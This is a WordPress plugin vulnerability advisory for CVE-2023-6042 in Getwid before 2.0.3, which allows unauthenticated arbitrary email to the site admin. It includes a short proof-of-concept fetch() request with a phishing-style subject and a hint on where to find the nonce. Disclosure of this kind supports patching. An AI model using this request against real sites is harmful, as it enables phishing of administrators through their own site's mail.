Getwid < 2.0.3 – Unauthenticated Arbitrary Email Sending to Admin | CVE 2023-6042 | Plugin Vulnerabilities

Description

Any unauthenticated user may send e-mail from the site with any title or content to the admin

Proof of Concept

fetch("http://127.0.0.1:8001/wp-admin/admin-ajax.php?action=getwid_send_mail", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
   },
  "body": "data[subject]=Urgent WordPress update neeeds to be installed&data[message]=Fake notification for the admin with some link to be clicked&security=4c71dae953", /* the nonce is in the page source under recaptcha_v2_contact_form key */
  "method": "POST", 
});

Affects Plugins

Fixed in 2.0.3

References

CVE

Classification

Type

AUTHBYPASS

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając (CERT PL)

Submitter

Krzysztof Zając (CERT PL)

Submitter website

https://cert.pl

Submitter twitter

Verified

Yes

WPVDB ID

56a1c050-67b5-43bc-b5b6-28d9a5a59eba

Timeline

Publicly Published

2023-12-15 (about 2 years ago)

Added

2023-12-16 (about 2 years ago)

Last Updated

2023-12-16 (about 2 years ago)

Other

Published

Title

Published

2025-03-06

Title

WPCOM Member < 1.7.6 - Authentication Bypass via 'user_phone'

Published

2018-03-03

Title

Super Socializer < 7.11 - Authentication Bypass

Published

2020-02-16

Title

ThemeGrill Demo Importer < 1.6.3 - Auth Bypass & Database Wipe

Published

2016-06-21

Title

WordPress 4.5.2 - Password Change via Stolen Cookie

Published

2016-06-06

Title

OneLogin SAML SSO <= 2.1.5 - Authentication Bypass